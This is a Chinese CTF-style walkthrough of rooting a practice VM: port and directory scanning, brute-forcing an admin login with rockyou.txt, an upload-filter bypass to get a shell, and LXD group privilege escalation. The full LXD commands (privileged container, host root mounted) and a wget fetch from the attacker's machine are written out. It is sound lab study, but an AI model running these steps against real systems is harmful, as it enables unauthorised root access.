扫描IP以及端口: 访问80,一个模板网站,,,扫描目录: 不可描述的flag.txt.txt,去看看: 没找到,去看看administrator,尝试弱密码,登陆失败,没有用户名密码错误提升啥的: 继续寻找flag.txt.txt提示的hidden,,,再images中找到一个名叫hidden的图片: 去在线解密一下: 得到一个用户名mrrobot,需要进行暴力破解,,, 直接用bp抓包进行破解,这里我使用的是rockyou.txt,1000多万的字典,,,: 登录: 文件上传,,,,过滤了:The image format must be jpg,jpeg,gif,png 抓包进行修改: 就是上传到administrator目录下,访问,监听,, 获取到shell,,获取交互式shell: 查看用户存在一个exploiter用户: 继续查找可用文件,,找到一个buffer: 不会吧不会吧,不会又是pwn之类的吧,,strings查看一下: 找到一个密码,su expoliter: sudo -l查看一下,不能运行sudo,,: id看看,有lxd,,,可以尝试lxd提权: 具体方法请看这篇文章:Lxd Privilege Escalation 先在本地执行如下命令:
git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder ./build-alpine一开始一直failed,之后更新一下kali就好了: 可以看在目录下生成一个tar.gz文件: 上传到shell服务器上,,, 服务器上下载:
cd /tmp wget http://192.168.1.10:8000/apline-v3.12-x86_64-20201004_1015.tar.gz生成映像后,可以将其作为映像添加到LXD中:
lxc image import ./apline-v3.12-x86_64-20201004_1015.tar.gz --alias myimage使用list命令检查镜像列表:
lxc image list继续执行命令:
lxc init myimage ignite -c security.privileged=true lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true lxc start ignite lxc exec ignite /bin/sh id成功获取到flag:
几经波折,,,学到了许多东西,首先收获最大的就是lxd提权,第一次做, 找了很多文章,错误百出,不过好在最后解决了,,遇见问题不要慌张,慢慢去解决 曾经提权这一部分几度想放弃了,,,,lxd提权这部分需要消化理解吸收,还需加强自身实力